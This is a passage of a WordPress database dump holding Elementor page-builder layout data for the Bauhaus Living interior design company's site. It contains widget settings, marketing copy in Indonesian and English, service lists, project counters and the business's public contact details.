"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8611b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(899,22,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(923,38,'ova_met_header_version','ova,header-banner'),(924,38,'ova_met_footer_version','ova,footer'),(925,38,'ova_met_main_layout','global'),(926,38,'ova_met_wide_site','global'),(927,38,'_wp_page_template','elementor_header_footer'),(928,38,'_elementor_edit_mode','builder'),(929,38,'_elementor_template_type','wp-page'),(930,38,'_elementor_version','3.8.1'),(931,38,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/file-1.jpg\",\"id\":4884,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>\\u00a0<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":400},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Commercial\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Residential\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Office\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-building\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(932,38,'_elementor_page_assets','a:1:{s:6:\"styles\";a:2:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";}}'),(934,40,'ova_met_header_version','ova,header-banner'),(935,40,'ova_met_footer_version','ova,footer'),(936,40,'ova_met_main_layout','global'),(937,40,'ova_met_wide_site','global'),(938,40,'_wp_page_template','elementor_header_footer'),(939,40,'_elementor_edit_mode','builder'),(940,40,'_elementor_template_type','wp-page'),(941,40,'_elementor_version','3.8.1'),(942,40,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 